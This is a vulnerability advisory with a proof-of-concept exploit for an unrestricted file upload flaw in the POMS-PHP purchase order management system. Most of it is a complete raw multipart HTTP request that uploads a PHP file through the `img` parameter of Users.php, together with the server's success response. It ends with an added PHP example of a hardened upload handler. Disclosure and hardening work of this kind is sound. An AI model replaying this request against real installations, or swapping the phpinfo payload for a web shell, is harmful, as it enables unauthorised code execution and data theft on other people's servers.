POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit

## Author: nu11secur1ty

## Date: 11/08/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette

## Reference: https://portswigger.net/web-security/file-upload

## Description:

The `img` parameter is vulnerable to unrestricted file upload. This makes it easy for malicious users who are already logged in to this system to obtain sensitive information or, even worse, to destroy it very easily!

STATUS: HIGH - Vulnerability

[+]Exploit:

```
POST /purchase_order/classes/Users.php?f=save HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 709
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/?page=user
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="firstname"

Adminstrator
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="lastname"

Admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryoIjZa6BqBYZRIp8V--
```

[+]Response:

```
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:52:20 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

1
```

## Reproduce: [href](https://www.youtube.com/watch?v=XODY8SSz62c)

## Demo PoC: [href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html)

## Time spent: 00:05:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
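
One way to handle the `img` upload safely, as an added example that is not part of the original advisory and is not the POMS project's own code. The names `store_avatar()`, `UPLOAD_DIR` and `MAX_BYTES`, the storage path and the allowed image types are assumptions.

```php
<?php
// Added example, not POMS code. store_avatar(), UPLOAD_DIR and MAX_BYTES are
// hypothetical names chosen for illustration.
declare(strict_types=1);

// Assumed location; the web server must not execute scripts from this directory.
const UPLOAD_DIR = __DIR__ . '/../uploads/avatars';
const MAX_BYTES = 2 * 1024 * 1024;
// Allowlist: sniffed MIME type => extension assigned by the server.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_avatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('invalid size');
    }
    // Sniff the content; the client's Content-Type and filename are untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // The file must also parse as an image; a plain-text "info.php" does not.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name and extension: the client filename is discarded.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (isset($_FILES['img'])) {
    try {
        echo store_avatar($_FILES['img']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage();
    }
}
```

Content checks alone do not stop a valid image that also carries PHP code, which is why the stored extension is server-assigned and the upload directory must not execute scripts.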